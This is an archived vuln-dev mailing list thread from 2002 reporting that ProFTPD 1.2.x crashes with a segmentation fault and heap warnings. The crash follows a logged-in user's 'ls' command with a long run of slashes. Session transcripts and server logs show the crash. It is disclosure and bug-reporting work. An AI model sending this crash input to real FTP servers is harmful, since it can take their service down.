Vulnerability Development mailing list archives

RE: Proftpd SIGSEGV

From: Yanek Korff <yanek () cigital com>
Date: Fri, 4 Jan 2002 10:20:47 -0500

user:~> ftp localhost
Connected to localhost.
220 localhost FTP server ready.
Name (localhost:user): user
331 Password required for user.
Password:
230 User user logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
////////////////////////////////////////////////////////////////////////////
///////////////////////////
////////////////////////////////////////////////////////////////////////////
///////////////////////////////////
///////////////////////////////////////////
227 Entering Passive Mode (127,0,0,1,19,133).
150 Opening ASCII mode data connection for file list
Jan  4 10:18:35 hostname proftpd[98202]: localhost (localhost[127.0.0.1]) -
ProFTPD terminating (signal 10) 
Jan  4 10:18:35 hostname proftpd[98202]: localhost (localhost[127.0.0.1]) -
ProFTPD terminating (signal 11) 

^C
receive aborted
waiting for remote to finish abort.
proftpd in free(): warning: junk pointer, too high to make sense.
proftpd in free(): warning: junk pointer, too high to make sense.
ftp> proftpd in free(): warning: modified (chunk-) pointer.

proftpd-1.2.4
FreeBSD-4.4 STABLE

-Yanek.

-----Original Message-----
From: Yaroslav Klyukin [mailto:bulldozer () skintwin no-ip com]
Sent: Sunday, December 30, 2001 9:53 AM
To: vuln-dev () securityfocus com
Subject: Proftpd SIGSEGV

I have found some strange things happening with proftpd (I 
tried 1.2.2 
and 1.2.4. on different systems)

When you issue
ls 
////////////////////////////////////////////////////////////////////

command it will catch SIGSEGV and exit (11)

I am not sure if it is already known, i send it just in case.

Example:

[root@desktop skintwin]# /usr/local/sbin/proftpd
[root@desktop skintwin]# ftp localhost
Connected to localhost.localdomain.
220 ProFTPD 1.2.4 Server (ProFTPD Default Installation) 
[desktop.skintwin.no-ip.com]
Name (localhost:skintwin):
331 Password required for skintwin.
Password:
230 User skintwin logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls 
//////////////////////////////////////////////////////////////
/////////////////////
227 Entering Passive Mode (127,0,0,1,4,100).
150 Opening ASCII mode data connection for file list
421 Service not available, remote server has closed connection
ftp>

In log files i have:

Dec 30 17:46:27 desktop proftpd[1329]: desktop.skintwin.no-ip.com - 
ProFTPD 1.2.4 (release) (built Сбт Дек 29 23:27:35 MSK 2001) 
standalone 
mode STARTUP
Dec 30 17:46:35 desktop proftpd[1331]: desktop.skintwin.no-ip.com 
(localhost.localdomain[127.0.0.1]) - FTP session opened.
Dec 30 17:47:09 desktop proftpd[1331]: desktop.skintwin.no-ip.com 
(localhost.localdomain[127.0.0.1]) - ProFTPD terminating (signal 11)

-- 
Systems admin of skintwin.no-ip.com
Visit http://skintwin.no-ip.com:777/

Current thread:

Re: Proftpd SIGSEGV Nelson Sampaio Araujo Junior (Jan 02)
- RE: Proftpd SIGSEGV Ryan Yagatich (Jan 02)
- <Possible follow-ups>
- RE: Proftpd SIGSEGV Ryan Yagatich (Jan 03)
- RE: Proftpd SIGSEGV Yanek Korff (Jan 04)